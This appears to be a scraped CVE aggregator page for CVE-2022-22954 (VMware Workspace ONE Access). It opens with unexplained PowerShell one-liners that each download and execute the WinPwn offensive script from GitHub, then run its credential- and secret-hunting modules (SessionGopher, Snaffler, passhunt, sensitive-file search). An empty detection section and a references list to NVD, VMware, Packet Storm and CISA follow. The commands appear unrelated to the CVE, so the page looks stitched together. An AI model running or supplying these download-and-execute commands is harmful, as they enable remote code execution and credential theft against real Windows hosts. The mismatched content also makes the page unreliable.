iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-22954 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2022-0011.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-22954 |